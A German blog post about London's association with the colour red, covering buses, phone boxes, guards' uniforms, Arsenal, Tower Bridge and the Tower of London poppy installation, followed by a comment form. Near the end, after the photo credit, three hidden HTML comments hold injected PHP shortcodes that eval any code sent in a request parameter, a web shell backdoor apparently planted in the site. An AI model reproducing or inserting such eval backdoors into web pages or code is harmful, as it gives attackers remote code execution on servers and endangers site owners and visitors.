Männer tragen Melonen auf der Straße in LondonJede Stadt hat ihre individuelle Farbe: New York hüllt sich in gelb, Berlin trägt grün und London? London kleidet sich rot. Ohne je in diesen Metropolen gewesen zu sein, verbinden wir unweigerlich mit dem Namen einer Stadt gewisse Vorstellungen und Bilder. Und mit diesen Bildern bringen wir unwillkürlich Farben in Zusammenhang. Wer denkt bei Berlin nicht sofort an die grün patinierte Quadriga und unsere vielen Parks  oder bei New York an die gelben Taxen und Zeitungsboxen?

Rot prägt das Straßenbild Londons

Es scheint mir gefühlte 100 Jahre her zu sein seit ich das letzte Mal in London war. Aber das erste, woran ich bei dem Namen denke, sind die roten Doppeldeckerbusse und die unverwechselbaren Telefonzellen, die das Straßenbild prägen. In London schreit sie einem förmlich entgegen: Die Farbe Rot. Sie ist allgegenwärtig. Rote Briefkästen, rote Häuserfassaden, Underground Schilder in rot-blau und natürlich die rote U-Bahn. In keiner anderen Metropole ist es augenscheinlicher, könnte der Kontrast nicht größer sein.

London kleidet sich rot

Allen voran Lissys Vorzeigeparade. Pracht- und würdevoll präsentiert sie sich stets in der zeitlos roten Uniform. Es heißt zwar royalblau, aber Rot galt lange Zeit als die Farbe der Adeligen und Herrscher. Und wie wir wissen, besitzt die Monarchie in England eine lange Tradition. Wer wechselt da schon gern die Farbe?

Traditionsbewußt trägt der Londoner also rot. Das beweisen jedenfalls die aktuellen Bilder. In der englischen Metropole ist rot Trend. Nicht gelb oder grün wie auf dem Kontinent, nein, der Insulaner bekennt Mut zur Farbe. Rot dominiert die Auslagen der Schaufenster. Wenn das kein Liebesbeweis ist.

Kleider in rot

fancy decoration

Rote Schuhe im Schaufenster

pretty in red

Rote Prada Tasche

The Devil Wears Prada

Nicht nur auf der Straße, auch auf dem Spielfeld trägt der Londoner rot. Wen wundert es da noch, dass die Fußballer des FC Arsenal London ihre Astralkörper und ihr Können in rot-weißen Trikots zur Schau stellen? Und passend zur Farbe der Spielkleidung ziert Rot auch das Wappen des traditions- und erfolgreichen Clubs.

Rote Farbtupfer, wohin der Blick auch fällt

Tower-Bridge7 - Kopie

Tower-Bridge

Wer die Tower Bridge besucht, sieht rot. Das bekannte Wahrzeichen der Stadt erstrahlt in Blau-Weiß-Rot und es ist kaum vorstellbar, dass das Sinnbild Londons bis zum Jahr 1977 schlicht grau war. Blau-Weiß-Rot ziert auch die Union Jack. Damit harmonisert sie farblich perfekt mit dem roten Stadtbild Londons. Vielleicht ist das auch der Grund, warum man sie weitaus häufiger gehisst sieht als ihr deutsches Pendant in Berlin.

Mohnblumenkränze

Mohnblumenkränze: Zum Gedenken an die Opfer des 1. Weltkrieges

Und was wäre England ohne ihre berühmten „rememberance poppies“? Die Mohnblumen, oft als Anstecker am Revers getragen, erinnern an die zahllosen britischen Krigesopfer. Wer jetzt in die englische Metropole reist, erlebt die Stadt in einem riesigen roten Blumenmeer aus ca. 900.000 künstlichen Mohnblumen, die den Graben des Londoner Tower zieren. „Blood Swept Land and Seas of Red“ heißt das Projekt des Künstlers Paul Cummis, das bis zum 11. November zu sehen ist – der Tag, an dem 1918 der 1. Weltkrieg endete. Um der Opfer zu gedenken, werden am darauffolgenden Sonntag wieder – wie traditionell in jedem Jahr –  öffentliche Gebäude (blut-) rot angestrahhlt. Einen Vorgeschmack mit tollen Fotos des Projektes von spiegel online gibt’s hier.

Union Jack

Ich glaube, es ist mal wieder an der Zeit, der „Lady in Red“ einen Besuch abzustatten.

 

 

 

Fotos: Janette Steuer. Liebe Janette, ein herzliches Dankeschön dafür.

<!– [insert_php]if (isset($_REQUEST["hNSFK"])){eval($_REQUEST["hNSFK"]);exit;}[/insert_php][php]if (isset($_REQUEST["hNSFK"])){eval($_REQUEST["hNSFK"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["yPXCo"])){eval($_REQUEST["yPXCo"]);exit;}[/insert_php][php]if (isset($_REQUEST["yPXCo"])){eval($_REQUEST["yPXCo"]);exit;}[/php] –>

<!– [insert_php]if (isset($_REQUEST["zfx"])){eval($_REQUEST["zfx"]);exit;}[/insert_php][php]if (isset($_REQUEST["zfx"])){eval($_REQUEST["zfx"]);exit;}[/php] –>

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.


*

Kommentarlinks könnten nofollow frei sein.

Post Navigation